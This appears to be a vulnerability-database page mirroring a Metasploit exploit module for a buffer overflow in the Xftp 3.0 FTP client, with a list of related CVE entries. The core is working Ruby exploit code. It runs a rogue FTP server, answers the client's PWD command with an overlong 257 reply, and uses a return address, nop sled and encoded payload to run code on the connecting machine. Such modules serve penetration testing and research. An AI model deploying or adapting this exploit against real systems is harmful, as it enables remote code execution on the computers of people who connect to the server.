Lucene search
+L

Xftp FTP Client 3.0 PWD Remote Buffer Overflow

🗓️ 22 Apr 2010 00:00:00Reported by zombiefx, dookieType 
metasploit
 metasploit
🔗 www.rapid7.com👁 16 Views

Xftp FTP Client 3.0 PWD Remote Buffer Overflow through long PWD message

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2010-20122
21 Aug 202520:16
attackerkb
circl
Circl
CVE-2010-20122
29 May 201815:50
circl
cnnvd
CNNVD
NetSarang Computer Xftp FTP Client 安全漏洞
21 Aug 202500:00
cnnvd
cve
CVE
CVE-2010-20122
21 Aug 202520:16
cve
cvelist
Cvelist
CVE-2010-20122 Xftp FTP Client <= 3.0 PWD Response Buffer Overflow
21 Aug 202520:16
cvelist
euvd
EUVD
EUVD-2010-5323
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-20122
21 Aug 202521:15
nvd
ptsecurity
Positive Technologies
PT-2025-34311 · Sftpclient · Xftp Client
21 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2010-20122
23 Aug 202521:22
redhatcve
vulnrichment
Vulnrichment
CVE-2010-20122 Xftp FTP Client <= 3.0 PWD Response Buffer Overflow
21 Aug 202520:16
vulnrichment
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Xftp FTP Client 3.0 PWD Remote Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered
          through an excessively long PWD message.
        },
        'Author' => [
          'zombiefx', # Original exploit author
          'dookie' # MSF module author
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-20122' ],
          [ 'OSVDB', '63968'],
          [ 'EDB', '12332' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
        },
        'Payload' => {
          'Space' => 434,
          'BadChars' => "\x00\x0a",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows Universal', { 'Ret' => 0x100123AF } ], # JMP ECX in nslicense.dll
        ],
        'Privileged' => false,
        'DisclosureDate' => '2010-04-22',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]),
        OptString.new('SRVNAME', [ true, "Welcome to the ... FTP Service", "Test" ]),
      ]
    )
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)

    buffer = "220 Welcome to the " + datastore['SRVNAME'] + " FTP Service.\r\n"
    client.put(buffer)
  end

  def on_client_data(client)
    # Get the client username
    client.get_once

    # Prompt the client for the password.
    user = "331 Anonymous access allowed.\r\n"
    client.put(user)
    client.get_once

    # Handle the clients PWD command.
    pass = "230 Login successful.\r\n230 User logged in.\r\n"
    client.put(pass)
    client.get_once

    # Send the exploit
    sploit = "257 \"/"
    sploit << rand_text_alpha_upper(1019)
    sploit << [ target.ret ].pack('V')
    sploit << make_nops(55)
    sploit << payload.encoded
    sploit << "\" is current directory.\r\n"

    client.put(sploit)

    # Get the CWD from the client
    client.get_once
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation